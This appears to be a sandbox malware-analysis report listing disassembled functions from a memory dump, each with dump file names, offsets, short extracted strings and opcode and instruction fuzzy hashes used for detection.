                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5nki$5nki$:A?h$;A?h$;A?h
                                                • API String ID: 0-3808611175
                                                • Opcode ID: 17a1e6e6661ad7bc9c360cf986403d14216c4d987dcc975ae746ad0f804ab0f5
                                                • Instruction ID: a213e124b4d667f9ec10c02a07e4205c12008077ed9c3c85d746732dcc694155
                                                • Opcode Fuzzy Hash: 17a1e6e6661ad7bc9c360cf986403d14216c4d987dcc975ae746ad0f804ab0f5
                                                • Instruction Fuzzy Hash: 93721B36B0C68187DB749629A4C177EAB90E784B40FD04937EF5ED7B94EE2CD5408B22
                                                Function 00007FF7D5065AD4 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 267COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]t{$]t{
                                                • API String ID: 0-2389501032
                                                • Opcode ID: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
                                                • Instruction ID: 0b4c2f443b981de637b0759c31d1fb4fc954122489aa5593c58a6537bd2b8a52
                                                • Opcode Fuzzy Hash: 164210f4765284c270436e7d01fdda11d64ce39c3a00b73971ac0ff793d94f89
                                                • Instruction Fuzzy Hash: 24B15E35F0C14287FA7C763850E423EE6D26F91B04EE4023BED6F46AD6CD9DA9844672
                                                Function 00007FF7D50E6B70 Relevance: 5.5, Strings: 4, Instructions: 512COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: wnZ:$wnZ:$wtx^$wtx^
                                                • API String ID: 0-3875597248
                                                • Opcode ID: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
                                                • Instruction ID: d3e2bd7755d7906b500846cdf26b183ce332267f343238a9c42d112b76807c46
                                                • Opcode Fuzzy Hash: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
                                                • Instruction Fuzzy Hash: EB22C666D0CA8E87EA349A35B41063FEA54BB50F9CFF48533DDAA07B98CE6CD4804751
                                                Function 00007FF7D50C898B Relevance: 4.4, Strings: 3, Instructions: 688COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *FN$W}:!$[[\
                                                • API String ID: 0-977268304
                                                • Opcode ID: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
                                                • Instruction ID: 8c0862e6007d889729b0be92552d41ad7b1fb79ccc8cb63a0e4e5fc0a37213c4
                                                • Opcode Fuzzy Hash: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
                                                • Instruction Fuzzy Hash: 5B62D626A086C28BEB745F3898843FD63A0EF55B58FD40533DE4D8F794DE29E6809352
                                                Function 00007FF7D506FB70 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: W!$W!
                                                • API String ID: 0-695975270
                                                • Opcode ID: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
                                                • Instruction ID: aa635b72e1c6005e872a39322411483d6e8b84f0fb7a83eb57074aedfa2ea5c4
                                                • Opcode Fuzzy Hash: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
                                                • Instruction Fuzzy Hash: 15B13C27B1C1414BEA649B38659113EF6D0AF8DB50FE46233FE99C379CCE2CD8444A11
                                                Function 00007FF7D50C4370 Relevance: .6, Instructions: 618COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
                                                • Instruction ID: f7c53929d38ca3d7ec5a65c267d8db346dd2e7373ef369bd449a72ac40dd806c
                                                • Opcode Fuzzy Hash: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
                                                • Instruction Fuzzy Hash: 2F42AB36A0C68647DA749E29B08067DE2E0FB86B57FE05533EE8DC7B98DE6CD4404B11
                                                Function 00007FF7D50B7D60 Relevance: .6, Instructions: 583COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
                                                • Instruction ID: dcf719f5770dacf1170c93c9588ed68f3e0b8de32a465c0ed53f7195f26ece58
                                                • Opcode Fuzzy Hash: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
                                                • Instruction Fuzzy Hash: 9632EB31B1D64187EB7C5A34A4D037EBA92AF98B50FE0013BED5E87B94CE2DE8414751
                                                Function 00007FF7D50B2080 Relevance: .3, Instructions: 294COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88782fa51e5a35d4abb1e03b7332a22d9764ab5c9b47563f957e86d09eac9e62
                                                • Instruction ID: eacd3a15856759abab596b7cd7e2d38e6c973f8a08e1f756b483811f3788f05e
                                                • Opcode Fuzzy Hash: 88782fa51e5a35d4abb1e03b7332a22d9764ab5c9b47563f957e86d09eac9e62
                                                • Instruction Fuzzy Hash: 3BC1F722A1C64287EB749B39A1D073EFA91E784B50FD04437EE5EC77A9CE2DD8409B11
                                                Function 00007FF7D50C2D70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: FA2$FA2$PG<;$PG<;
                                                • API String ID: 2738559852-1104478874
                                                • Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
                                                • Instruction ID: dc7b4584e801b484718fab2c26337e74fb7d5210bfdedb13f89a2429bd89d06f
                                                • Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
                                                • Instruction Fuzzy Hash: B1214612A0CA8343EA306A25A40437EA6609B57F64FD94633EE9DCABD4CE3CD8418760
                                                Function 00007FF7D5087E40 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 277COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: aCo2$aCo2$/~$/~
                                                • API String ID: 0-3304968679
                                                • Opcode ID: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
                                                • Instruction ID: e8e2601fad3792e694385536337a7ef498ccca7c45e2f8c89a3d302401826193
                                                • Opcode Fuzzy Hash: 22d7c74f97c3fa7b79090f9a1661b0688eada34713547cfb80454c75f8ba8637
                                                • Instruction Fuzzy Hash: 8FB1DB31A0D20587EA68BA689050B3EEAD1EB45F44FE04437ED5DC7798CE3EEC419B52